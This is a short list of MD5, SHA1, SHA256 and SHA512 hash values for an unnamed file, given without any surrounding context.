MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97